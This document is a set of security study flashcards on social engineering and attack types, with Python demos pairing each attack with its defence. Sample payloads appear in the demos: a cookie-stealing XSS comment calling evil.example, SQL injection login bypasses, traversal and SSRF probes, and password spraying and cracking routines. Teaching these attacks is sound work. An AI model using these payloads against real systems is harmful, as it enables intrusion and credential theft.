Chapter 8: Social Engineering and Attacks Flashcards

1
Q

Two types: active and passive. Passive reconnaissance is where the attacker researches your company and collects information (public records, social media, DNS and job postings) to be used at a later stage, without ever touching your systems. Active reconnaissance is where the attacker interacts with the target, its users or their desktops, for example someone who has your username and tries to reset the password.

A

Reconnaissance

2
Q

Campaigns are a social engineering attack intended to influence people from countries all over the world. Two types: social media campaigns and hybrid warfare.

A

Influence Campaigns

3
Q

Carried out by state actors to influence the balance of power in a country using a mix of military, political, economic and civil means, including cyber attacks and disinformation.

A

Hybrid warfare

4
Q

When someone goes through your trash in the hope of finding a letter or document that holds PII that can be used to commit fraud. Shredding documents before disposal is the countermeasure.

A

Dumpster Diving

5
Q

Involves a person standing behind someone who is using a computer, ATM or keypad so that they can see sensitive information such as a password or PIN being entered.

A

Shoulder surfing

6
Q

People in the same industry visit similar websites. Attackers therefore identify a website that people in a particular industry are likely to visit and compromise it so that it serves malware to its visitors.

A

Watering Hole Attack

7
Q

A DNS redirection attack where either the DNS cache has been poisoned or an entry has been placed in the victim's hosts file. The victim types the correct address but is redirected to a fraudulent website.

A

Pharming

8
Q

Types of Social Engineering

A

Authority: an email appears to come from someone of higher authority ordering you to complete a form that can be accessed by clicking a link.

Intimidation: someone pretending to be a person of high authority threatens an individual, telling them they are in trouble if they don't do what they are told.

Urgency: someone arriving at a reception desk and demanding access quickly, so that the normal checks are skipped.
Scarcity: creating panic so the victim makes a snap decision. "Only one room left."

Familiarity and Trust: attackers make themselves familiar to their victims; they come around a lot, bringing boxes of chocolates, and eventually they become trusted.

Consensus: people like to be accepted by peers and coworkers. An attacker might ask for some information and state that they obtained it last week from a coworker and need an update on it.

9
Q

A hacker who is not authorized by the company and therefore has no inside information about the target; their intent is malicious.

A

Black Hat

10
Q

Is provided with limited information from the company, for example because they are participating in its bug bounty program. Semi-authorized; sometimes grouped with ethical hackers.

A

Gray Hat

11
Q

An ethical hacker who is employed or authorized by the company to test its applications for flaws and vulnerabilities.

A

White Hat

12
Q

External threat actor who defaces your website or breaks into your computer or network. They are politically motivated and seek social change.

A

Hacktivists

13
Q

Where people plug their own computers and devices into your network, or use their own applications and cloud services for company work, without the knowledge or consent of the IT department.

A

Shadow IT

14
Q

A person who does not have expert technical knowledge and uses scripts and code that they find online to launch an attack on your company.

A

Script Kiddie

15
Q

A foreign government (nation-state) that poses a threat to your country; state actors are well funded and often run APT groups.

A

State Actors

16
Q

External threat that tries to steal data from your network while remaining undetected for an extremely long period of time. They are well organized, well funded and sophisticated.

A

Advanced Persistent Threat (APT)

17
Q

Organized crime groups whose main target is money, for example through ransomware and fraud.

A

Criminal Syndicates

18
Q

A disgruntled employee, perhaps overlooked for promotion, whose relationship with the company has gone sour. They already have legitimate access, which makes them hard to detect.

A

Insider Threat

19
Q

Start by using all the words in the Oxford English Dictionary (or a word list) and try each one as the password, but misspelled words or passwords with special characters can't be cracked this way.
-could crack elasticity but not el@sticity

A

Dictionary Attacks

20
Q

Runs through all the different combinations of letters, digits and symbols and will eventually crack a given password. Each extra character multiplies the search space by the alphabet size, so length slows the attack down, but given enough time the password will be cracked.

A

Brute Force Attacks

21
Q

A combination of a dictionary attack and a brute force attack: dictionary words are mangled (characters substituted, digits or symbols appended), so variants such as el@sticity or password123 are covered.

A

Hybrid Attack
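As an added example (not from the flashcards), the three guessing strategies from the last three cards run in Python against an unsalted SHA-256 hash. The target password el@sticity is the card's own example of a word a plain dictionary attack misses but a hybrid attack recovers. The word list, the mangling rules and the use of SHA-256 are assumptions made for the demo; real tools such as hashcat apply far larger rule sets.

```python
"""Dictionary, brute-force and hybrid password guessing (demo, constructed data)."""
import hashlib
import itertools
import string

# Constructed mini word list standing in for a real dictionary.
WORDLIST = ["password", "welcome", "elasticity", "summer", "dragon"]

# Substitutions a hybrid attack applies to dictionary words.
LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"}


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def dictionary_attack(target_hash: str, words=WORDLIST):
    """Try each dictionary word as-is; misses mangled words like el@sticity."""
    for word in words:
        if sha256_hex(word) == target_hash:
            return word
    return None


def mangle(word: str):
    """Yield the word plus common variants: capitalised/upper-cased forms,
    popular suffixes, and every combination of leet substitutions."""
    for base in {word, word.capitalize(), word.upper()}:
        yield base
        for suffix in ("1", "123", "!", "2024"):
            yield base + suffix
    positions = [i for i, ch in enumerate(word) if ch in LEET]
    for r in range(1, len(positions) + 1):
        for combo in itertools.combinations(positions, r):
            chars = list(word)
            for i in combo:
                chars[i] = LEET[chars[i]]
            yield "".join(chars)


def hybrid_attack(target_hash: str, words=WORDLIST):
    """Dictionary words run through the mangling rules."""
    for word in words:
        for candidate in mangle(word):
            if sha256_hex(candidate) == target_hash:
                return candidate
    return None


def brute_force(target_hash: str, alphabet=string.ascii_lowercase, max_len=4):
    """Exhaustive search up to max_len characters. Returns (password, attempts);
    the attempt count shows why length is the main defence: each extra
    character multiplies the work by len(alphabet)."""
    attempts = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            attempts += 1
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hash:
                return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    h = sha256_hex("el@sticity")
    print("dictionary:", dictionary_attack(h))
    print("hybrid:", hybrid_attack(h))
    print("brute force 'abc':", brute_force(sha256_hex("abc")))
```

Real password stores should use a slow, salted hash (bcrypt, scrypt, Argon2) precisely so that each guess above costs far more than one SHA-256 call.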

22
Q

Password spraying uses one of the most common passwords against many accounts, a type of reverse brute force attack. Because each account sees only one or two failed attempts, the account lockout threshold is never reached. The hacker first searches the internet for people who work within the organization and tries to work out the standard username naming convention (for example first.last).

A

Spraying Attack
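Added example, not from the flashcards: why spraying evades lockout. A constructed authentication service locks an account after three consecutive failures. Brute-forcing one account trips the lockout; spraying one password across every account stays under the threshold. The users, passwords, the first.last convention and the lockout policy are all made up for the demo.

```python
"""Password spraying versus single-account brute force (demo, constructed data)."""
LOCKOUT_THRESHOLD = 3

# Constructed directory: username (first.last convention) -> password.
USERS = {
    "alice.smith": "Summer2024!",
    "bob.jones": "Winter2023!",
    "carol.white": "Summer2024!",
    "dave.brown": "Tr0ub4dor&3",
}


class AuthService:
    """Toy login service with a per-account lockout counter."""

    def __init__(self, users, threshold=LOCKOUT_THRESHOLD):
        self.users = users
        self.threshold = threshold
        self.failures = {u: 0 for u in users}
        self.locked = set()

    def login(self, username, password):
        """Return 'ok', 'locked' or 'fail'. Locks after `threshold`
        consecutive failures; a success resets the counter."""
        if username not in self.users:
            return "fail"
        if username in self.locked:
            return "locked"
        if self.users[username] == password:
            self.failures[username] = 0
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= self.threshold:
            self.locked.add(username)
        return "fail"


def build_usernames(names):
    """Turn 'Alice Smith' into 'alice.smith', the convention the attacker guessed."""
    return [n.lower().replace(" ", ".") for n in names]


def brute_force_one_account(auth, username, guesses):
    """Classic brute force: many passwords against one account."""
    for pw in guesses:
        result = auth.login(username, pw)
        if result == "ok":
            return pw
        if result == "locked":
            return "LOCKED"
    return None


def password_spray(auth, usernames, common_passwords):
    """Reverse brute force: one password against every account, then the next.
    Each account sees at most len(common_passwords) failures."""
    compromised = {}
    for pw in common_passwords:
        for user in usernames:
            if auth.login(user, pw) == "ok":
                compromised[user] = pw
    return compromised


if __name__ == "__main__":
    names = ["Alice Smith", "Bob Jones", "Carol White", "Dave Brown"]
    guesses = ["Password1", "Welcome1", "Autumn2024!", "Summer2024!"]
    print(brute_force_one_account(AuthService(USERS), "alice.smith", guesses))
    print(password_spray(AuthService(USERS), build_usernames(names), ["Password1", "Summer2024!"]))
```

Detection therefore has to look across accounts (many usernames, one source, one failure each) rather than at a single account's failure counter.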

23
Q

An attacker navigates the directory structure of a web server outside the web root by placing ../ sequences in a URL or file parameter, reaching files such as configuration files or the password file that the application was never meant to serve.

A

Directory Traversal
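Added example (not from the flashcards): a file handler that joins the requested name straight onto the web root, beside one that URL-decodes, normalises and checks that the resolved path is still inside the root. The web root, its files and the four probe requests are constructed in a temporary directory for the demo.

```python
"""Directory traversal and a path-containment check (demo, constructed files)."""
import os
import tempfile
from urllib.parse import unquote


def resolve_unsafe(web_root: str, requested: str) -> str:
    # Vulnerable: os.path.join follows '..' out of web_root, and an
    # absolute path in `requested` replaces web_root entirely.
    return os.path.normpath(os.path.join(web_root, requested))


def resolve_safe(web_root: str, requested: str):
    """Return the real path if it lies inside web_root, else None.

    URL-decode twice (catches %2e%2e%2f and %252e), strip a leading slash so
    the request cannot name an absolute path, resolve symlinks with realpath,
    then verify the result is the root itself or a descendant of it."""
    root = os.path.realpath(web_root)
    relative = unquote(unquote(requested)).lstrip("/\\")
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def traversal_demo():
    """Build a throwaway web root and probe it with four requests."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "www")
        os.makedirs(os.path.join(root, "images"))
        with open(os.path.join(root, "images", "logo.txt"), "w") as f:
            f.write("logo")
        with open(os.path.join(tmp, "secret.txt"), "w") as f:  # outside the web root
            f.write("db_password=hunter2")

        results = {}
        for req in ("images/logo.txt", "../secret.txt", "%2e%2e%2fsecret.txt", "/etc/passwd"):
            unsafe_path = resolve_unsafe(root, unquote(req))
            results[req] = {
                "unsafe_escapes_root": os.path.commonpath([root, unsafe_path]) != root,
                "safe_accepts": resolve_safe(root, req) is not None,
            }
        return results


if __name__ == "__main__":
    for req, outcome in traversal_demo().items():
        print(f"{req:22} {outcome}")
```

Note that the safe resolver turns /etc/passwd into a harmless path under the web root (it is accepted, then simply not found); only the containment check on the fully resolved path matters, not the shape of the input.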

24
Q

Can also be called "skimming": a credit card is put through a card-cloning device (skimmer) that copies the data from its magnetic stripe. The most common places for these devices are ATMs and restaurants, where the card is out of your sight while you pay the bill.

A

Card Cloning

25
Q

The attacker intercepts traffic going between two hosts and can read or change the information in the packets in real time. Also called an on-path attack.

A

Man in the Middle Attack (MITM)

26
Q

Where a malicious plugin or script has been installed and the browser itself has been compromised. It acts like a trojan, modifying pages and transactions inside the browser, where the traffic has already been decrypted.

A

Man in the Browser Attack (MITB)

27
Q

An on-path attack that intercepts data (for example an authentication exchange) and replays it at a later time to gain access.

A

replay attack

28
Q

When a user visits a website a Session ID is set up between the user and the web server. It is stored in a cookie and is present in the traffic going between the user and the website. The attacker can steal the cookie, or use a protocol analyzer to capture the Session ID from unencrypted HTTP packets, and then present it to impersonate the user.

A

Session Replay Attack

29
Q

Where the victim's machine or network is flooded with a high volume of requests from another host so that it is not available for legitimate hosts to use. A common method is the SYN flood, where only the first two parts of the three-way handshake occur: the attacker sends many SYNs, the server replies SYN-ACK, and the final ACK never comes, so half-open connections exhaust the server's connection table.

A

DoS Attack

30
Q

When a vulnerability is exploited before the vendor knows about it or has released a patch, so at the time there is no fix to prevent it.

A

zero day attack

31
Q

Where an attacker gains a foothold on the network via a vulnerable host and then uses that host as a stepping stone to attack more critical systems such as a domain controller or a database server. Breaking out of a virtual machine to reach the hypervisor or host is a different attack, known as VM escape.

A

Pivoting

32
Q

Windows stores passwords locally as NT hashes (MD4 of the password); older systems such as Windows NT 4.0 also kept the weaker LM hash. In pass the hash the attacker does not need to crack the hash at all: NTLM authentication accepts the hash itself, so a stolen hash can be used to log on. If the plaintext is wanted, rainbow tables or hashcat can recover it from the hash. Mitigate pass the hash by disabling or restricting NTLM in favour of Kerberos.

A

Pass the Hash Attack

33
Q

Operates at layer 2 of the OSI model using MAC addresses. The attacker sends forged ARP replies so that hosts on the LAN map a legitimate IP address (typically the default gateway) to the attacker's MAC address. Traffic for that address is then sent to the attacker, who can forward it on, enabling an on-path attack.

A

ARP Poisoning
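Added example, not from the flashcards: the detection logic a network monitor applies to ARP replies. The records below are a constructed capture (timestamp, sender IP, sender MAC) in which a host rebinds the gateway address to its own MAC; all addresses are made up.

```python
"""Detect ARP poisoning from a list of observed ARP replies (demo, constructed data)."""
from collections import defaultdict

# Constructed sample: (timestamp, sender_ip, sender_mac) from ARP replies.
ARP_REPLIES = [
    (1.0, "10.0.0.1", "00:11:22:33:44:01"),    # real gateway
    (1.2, "10.0.0.25", "00:11:22:33:44:25"),   # a workstation
    (1.5, "10.0.0.30", "de:ad:be:ef:00:30"),   # attacker's own host
    (2.0, "10.0.0.1", "de:ad:be:ef:00:30"),    # attacker claims the gateway
    (2.1, "10.0.0.25", "de:ad:be:ef:00:30"),   # ... and the workstation
    (3.0, "10.0.0.1", "00:11:22:33:44:01"),    # gateway reasserts itself
]


def detect_arp_poisoning(replies, protected_ips=("10.0.0.1",)):
    """Return a list of alert strings.

    Check 1: an IP's MAC changes within the capture. A change for a
    protected IP (gateway) is HIGH, for any other IP MEDIUM, since DHCP
    reassignment can legitimately move an IP between devices.
    Check 2: one MAC answers for several IPs, the signature of a single
    attacker impersonating both ends of a conversation."""
    ip_to_macs = defaultdict(list)
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        seen = ip_to_macs[ip]
        if seen and seen[-1] != mac:
            sev = "HIGH" if ip in protected_ips else "MEDIUM"
            alerts.append(f"{sev} t={ts}: {ip} moved from {seen[-1]} to {mac}")
        seen.append(mac)
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(f"HIGH: {mac} claims {len(ips)} IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(ARP_REPLIES):
        print(alert)
```

Routers running first-hop redundancy protocols and some virtualisation hosts legitimately answer for several IPs, so check 2 needs an allowlist in production; static ARP entries for the gateway and Dynamic ARP Inspection on the switch prevent the attack rather than just detecting it.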

34
Q

The theft of the MAC address of another networked device, which the attacker's device then uses to gain access to the network, for example to bypass MAC-based filtering.

A

MAC Spoofing Attack

35
Q

Where an attacker floods a switch with frames from many fake source MAC addresses so that its MAC-address-to-port table (CAM table) fills up. Once the switch's limited memory is consumed it fails open and floods frames out of all ports like a hub, letting the attacker sniff traffic.

A

MAC Flooding

36
Q

An attack where an attacker grants themselves more permissions than they are entitled to, for example going from a standard user to administrator or root.

A

Privilege Escalation

37
Q

Used when you want to pretend to be a different device, so you can connect to a network device that filters on MAC address or bypass the security on a captive portal that has already authenticated the device you are cloning.

A

MAC Cloning Spoofing

38
Q

The modification of the source address in an IP packet to a fake IP address to mask the identity of the sender. This makes it harder to trace the attacker when they carry out a malicious attack; it is common in DoS attacks.

A

IP Spoofing

39
Q

An on-path attacker downgrades the victim's connection from HTTPS to HTTP: they keep an encrypted session to the server but serve the victim plain HTTP, bypassing the certificate-based protection so the victim's traffic can be read and modified. HSTS mitigates it.

A

SSL Stripping

40
Q

Where an attack on an application consumes all available memory and CPU, or where all the IP addresses in a DHCP scope have been handed out (DHCP starvation), so legitimate users cannot be served.

A

Resource Exhaustion

41
Q

A technique for running code within the address space of another process by forcing it to load a DLL. This makes the application run differently from how it was designed to; an attacker could load a malicious DLL into a trusted process to hide or to inherit its privileges.

A

Dynamic Link Library (DLL) Injection

42
Q

The victim must be authenticated to the web server. The attacker gets them to click a link, like or share button (or simply loads a page that submits a hidden form) so that their browser sends a request carrying the victim's session cookie and performs an action the victim did not intend.

A

Cross Site Request Forgery (CSRF)
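Added example, not from the flashcards: a constructed mini banking app. The vulnerable transfer handler trusts the session cookie alone, which the browser attaches to a forged cross-site request automatically; the protected handler also requires a per-session token that only the legitimate page knows. Users, balances and the route shape are assumptions for the demo.

```python
"""CSRF and the synchronizer-token defence (demo, constructed app state)."""
import hmac
import secrets

SESSIONS = {}                    # session_id -> {"user": ..., "csrf": ...}
BALANCES = {"alice": 100, "mallory": 0}


def login(user):
    """Create a session and a random CSRF secret bound to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """The legitimate page embeds this as a hidden form field."""
    return SESSIONS[sid]["csrf"]


def transfer_vulnerable(cookie_sid, form):
    """Relies on the cookie alone: a hidden form on evil.example submitted
    in the victim's browser carries the same cookie and succeeds."""
    sess = SESSIONS.get(cookie_sid)
    if not sess:
        return 401
    BALANCES[sess["user"]] -= form["amount"]
    BALANCES[form["to"]] += form["amount"]
    return 200


def transfer_protected(cookie_sid, form):
    """Same action, but the request must also carry the session's CSRF token,
    compared in constant time. The token lives in the page, not in a cookie,
    so a cross-site form cannot obtain it."""
    sess = SESSIONS.get(cookie_sid)
    if not sess:
        return 401
    if not hmac.compare_digest(form.get("csrf_token", ""), sess["csrf"]):
        return 403
    BALANCES[sess["user"]] -= form["amount"]
    BALANCES[form["to"]] += form["amount"]
    return 200


def csrf_demo():
    """Forged request against both handlers, then a legitimate one."""
    BALANCES.update({"alice": 100, "mallory": 0})
    sid = login("alice")
    forged = {"to": "mallory", "amount": 50}      # attacker's form: no token
    outcome = {"vulnerable": transfer_vulnerable(sid, forged)}
    outcome["protected_forged"] = transfer_protected(sid, forged)
    legit = dict(forged, csrf_token=csrf_token_for(sid))
    outcome["protected_legit"] = transfer_protected(sid, legit)
    outcome["alice_balance"] = BALANCES["alice"]
    return outcome


if __name__ == "__main__":
    print(csrf_demo())
```

Setting the session cookie with SameSite=Lax or Strict is a second, independent layer: the browser then withholds the cookie from cross-site POSTs entirely.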

43
Q

Uses a web application as the attack vector: the attacker supplies a URL that the backend server fetches itself, so the request appears to come from the server (localhost) and can reach internal services that are not exposed to the internet or, with a file:// URL, read local files such as /etc/passwd.

A

Server Side Request Forgery (SSRF)
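Added example, not from the flashcards: the destination check a server should run before fetching a user-supplied URL. It rejects non-http(s) schemes (so file:///etc/passwd fails), loopback, private, link-local and other non-public IP literals, and any hostname not on an allowlist. The allowlist hosts are assumptions; no network request is made.

```python
"""Outbound URL validation against SSRF (demo, constructed allowlist)."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.partner.example", "cdn.example"}   # constructed allowlist


def validate_outbound_url(url: str):
    """Return (ok, reason). Only http(s) to allowlisted hostnames passes."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname            # already lower-cased and bracket-stripped
    if not host:
        return False, "no host"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:
        # 127.0.0.1, 10.x, 169.254.169.254 (cloud metadata), ::1, multicast...
        if (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
            return False, f"{addr} is not a public address"
        return False, "raw IP literals not allowed; use an allowlisted hostname"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    return True, "ok"


def fetch_url_unsafe(url: str):
    """What the vulnerable app does: forwards any URL to the HTTP client."""
    return {"would_fetch": url}


def fetch_url_safe(url: str):
    ok, reason = validate_outbound_url(url)
    if not ok:
        return {"error": reason}
    return fetch_url_unsafe(url)     # stand-in for the real HTTP client call


if __name__ == "__main__":
    for u in ("file:///etc/passwd", "http://127.0.0.1/admin",
              "http://169.254.169.254/latest/meta-data/", "http://[::1]/",
              "http://2130706433/", "https://api.partner.example/v1/items"):
        print(f"{u:45} {fetch_url_safe(u)}")
```

The allowlist also defeats decimal or hex encodings of 127.0.0.1 such as 2130706433, since they are neither parseable IP literals nor listed hostnames. Two caveats remain: a listed hostname could later resolve to an internal address (DNS rebinding), so the address should be re-checked at connect time, and the HTTP client must not follow redirects to unchecked destinations.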

44
Q

When an attacker injects malicious code (HTML tags and JavaScript) into a page so that it runs in another user's browser, typically through a comment or search field whose content is displayed without being escaped.

A

Cross Site Scripting (XSS)
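Added example, not from the flashcards: a comment page rendered two ways. The unsafe renderer splices stored comments into the HTML verbatim, so a comment containing a script tag executes in every visitor's browser; the safe renderer escapes the HTML-significant characters. The comments are constructed samples.

```python
"""Stored XSS in a comment list and the output-encoding fix (demo, constructed comments)."""
import html
import re

# Constructed comments as a user might have submitted them.
COMMENTS = [
    "Great article!",
    '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
    '<img src=x onerror="alert(1)">',
]

TEMPLATE = "<ul>\n{items}\n</ul>"
TAG_RE = re.compile(r"<\s*(/?[a-zA-Z][a-zA-Z0-9]*)")


def render_comments_unsafe(comments):
    """Vulnerable: user content lands in the page unmodified."""
    items = "\n".join(f"<li>{c}</li>" for c in comments)
    return TEMPLATE.format(items=items)


def render_comments_safe(comments):
    """Escapes < > & " ' so user content is displayed as text, never parsed as markup."""
    items = "\n".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return TEMPLATE.format(items=items)


def unexpected_tags(rendered_html, allowed=("ul", "/ul", "li", "/li")):
    """Demo check: which tags appear in the output beyond the template's own?"""
    return [t for t in TAG_RE.findall(rendered_html) if t.lower() not in allowed]


if __name__ == "__main__":
    print(render_comments_unsafe(COMMENTS))
    print("unexpected tags:", unexpected_tags(render_comments_unsafe(COMMENTS)))
    print(render_comments_safe(COMMENTS))
    print("unexpected tags:", unexpected_tags(render_comments_safe(COMMENTS)))
```

Escaping must match the output context: html.escape is right for text between tags and for quoted attribute values, but content placed inside a script block, a URL or a CSS value needs that context's own encoding, and a Content-Security-Policy limits the damage when an escape is missed.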

45
Q

Occurs when a program tries to store more data in a buffer (a temporary memory storage area) than it can hold, overwriting adjacent memory such as other variables or a return address.

A

buffer overflow

46
Q

A condition that occurs when the result of an arithmetic operation, such as multiplication or addition, exceeds the maximum size of the integer type used to store it and wraps around. A wrapped length or size value can defeat bounds checks and lead to a buffer overflow.

A

integer overflow

47
Q

When an application builds SQL queries by concatenating user input into the query text (for example Transact-SQL on SQL Server), an attacker can enter input such as ' OR 1=1 -- that changes the meaning of the query to bypass a login or read other users' data.

A

SQL Injection Attack
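Added example, not from the flashcards: a login query built by string concatenation beside the parameterised version, run against an in-memory SQLite database with constructed users. SQLite syntax is used here; the same concatenation flaw exists in Transact-SQL or any other dialect.

```python
"""SQL injection against a login query and the parameterised fix (demo, constructed data)."""
import sqlite3


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "correct horse", "admin"),
        ("alice", "wonderland", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """User input is spliced into the SQL text, so quotes in the input
    end the string literal and the rest is parsed as SQL.
      username = "admin' --"  ->  ... WHERE username = 'admin' --' AND ...
    The -- comments out the password check entirely."""
    query = ("SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so a quote in the input is only ever data."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    conn = setup_db()
    print(login_vulnerable(conn, "admin' --", "anything"))      # logs in as admin
    print(login_vulnerable(conn, "", "' OR '1'='1"))            # every row
    print(login_safe(conn, "admin' --", "anything"))            # []
    print(login_safe(conn, "alice", "wonderland"))              # alice only
```

Storing plaintext passwords as this demo table does is itself a weak configuration; the point here is only that the parameter boundary, not input filtering, is what stops the injection.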

48
Q

Applications have a tendency to produce errors, and many return the raw error (stack trace, SQL error text, file path) to the user, leaking information about the system. Errors should be caught and a generic message shown, with the detail logged on the server.

A

Improper Error Handling

49
Q

Where data entered through a web page or wizard is checked so that only data in the correct format and within a range of minimum and maximum values is accepted. It is the primary defence against injection and overflow attacks.

A

Input Validation

50
Q

Sending unsolicited messages, such as a contact card, to a nearby Bluetooth device. Taking control of the phone to make calls and send texts is the more serious bluebugging attack.

A

Bluejacking

51
Q

An attacker connects to a Bluetooth phone and extracts contact details and any other sensitive information without the owner's knowledge.

A

Bluesnarfing

52
Q

When someone changes the registration of a domain with the registrar without the owner's permission so that they can control it for profit.

A

Domain Hijacking

53
Q

A process in which a website is falsely removed from the results of a search engine and replaced by another page under the attacker's control that sends visitors on to the attacker's site.

A

URL Hijacking

54
Q

Where an attacker redirects you from a legitimate website to a fraudulent website, for example by abusing an open redirect parameter on the legitimate site.

A

URL Redirection

55
Q

Hackers register domains with characters transposed or misspelled so that a user who mistypes the address is sent to a fraudulent website. This is also known as URL hijacking.

A

Typosquatting

56
Q

The process of changing an application's code (recompiling or obfuscating malware) to avoid detection by signature-based antivirus software while still retaining its attack functionality.

A

Refactoring

57
Q

A small library that transparently intercepts API calls and changes the arguments passed, redirecting or altering the call.

A

Shimming

58
Q

The birthday paradox states that in a random gathering of 23 people there is a 50 percent chance that two of them share a birthday. Applied to hashing, collisions are found far sooner than intuition suggests: about 2^(n/2) attempts for an n-bit hash rather than 2^n. If we store passwords as unsalted hashes, all passwords that are the same will produce the same hash under the same hashing algorithm, so one cracked hash exposes every user with that password.

A

Birthday Attack

59
Q

Lists of precomputed passwords with their corresponding hashes, used to look up a captured hash instead of cracking it. Free rainbow tables can be downloaded from the internet. Salting each password before hashing defeats them.

A

Rainbow Tables
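Added example covering the last two cards, not from the flashcards: a precomputed hash-to-password lookup, the salt that defeats it, and a birthday-bound collision search. The lookup here is a plain dictionary (a real rainbow table stores hash chains to trade time for space, but the idea is the same); the hash is truncated SHA-256 so the collision search finishes instantly. Word list and salt are constructed.

```python
"""Precomputed-hash lookup, salting, and a birthday collision search (demo, constructed data)."""
import hashlib

WORDLIST = ["password", "letmein", "qwerty", "elasticity", "summer2024"]


def h(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_table(words):
    """Precompute unsalted hashes once; reuse against every leaked hash."""
    return {h(w.encode()): w for w in words}


def lookup(table, leaked_hash):
    """One dictionary probe instead of re-hashing every candidate."""
    return table.get(leaked_hash)


def hash_with_salt(password: str, salt: bytes) -> str:
    # A per-user random salt makes the same password hash differently for
    # each user, so a single precomputed table matches nothing.
    return h(salt + password.encode())


def birthday_collision(bits: int):
    """Find two distinct messages whose SHA-256 digests agree on the first
    `bits` bits. Expected work is about 2**(bits/2) trials, not 2**bits;
    returns (msg1, msg2, trials)."""
    seen = {}
    n = 0
    while True:
        msg = n.to_bytes(8, "big")
        tag = int(h(msg), 16) >> (256 - bits)
        if tag in seen:
            return seen[tag], msg, n + 1
        seen[tag] = msg
        n += 1


if __name__ == "__main__":
    table = build_table(WORDLIST)
    print("unsalted lookup:", lookup(table, h(b"qwerty")))
    print("salted lookup:", lookup(table, hash_with_salt("qwerty", b"\x8f\x02salt")))
    m1, m2, trials = birthday_collision(32)
    print(f"32-bit collision after {trials} trials (2**32 = {2**32})")
```

For a real password store the salt is not enough on its own: the hash should also be slow (bcrypt, scrypt, Argon2) so that even a per-user table is too expensive to build.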

60
Q

Open permissions / Unsecured root accounts / Errors / Weak encryption / Default settings / Open ports and services

A

Weak Configurations